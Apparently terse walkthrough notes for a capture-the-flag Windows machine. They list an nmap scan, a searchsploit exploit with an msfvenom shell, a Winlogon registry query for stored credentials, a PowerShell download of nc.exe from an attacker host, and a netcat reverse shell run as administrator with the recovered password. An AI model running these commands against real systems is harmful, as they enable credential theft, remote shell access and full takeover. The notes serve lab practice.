nmap
Exploit
Create a shell with msfvenom as described in the exploit
Get the exploit from searchsploit or exploitdb
Shell
Privilege Escalation
reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon”
(New-Object System.Net.WebClient).DownloadFile(‘http://10.10.14.16:8000/nc.exe’,’C:\Users\Alfred\Desktop\nc.exe’)
$username = ‘administrator’$password = ‘Welcome1!’
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force$credential = New-Object System.Management.Automation.PSCredential $username, $securePasswordStart-Process C:\Users\Alfred\Desktop\nc.exe -ArgumentList ‘-e cmd.exe 10.10.14.16 1234’ -Credential $credential
And we get an admin shell
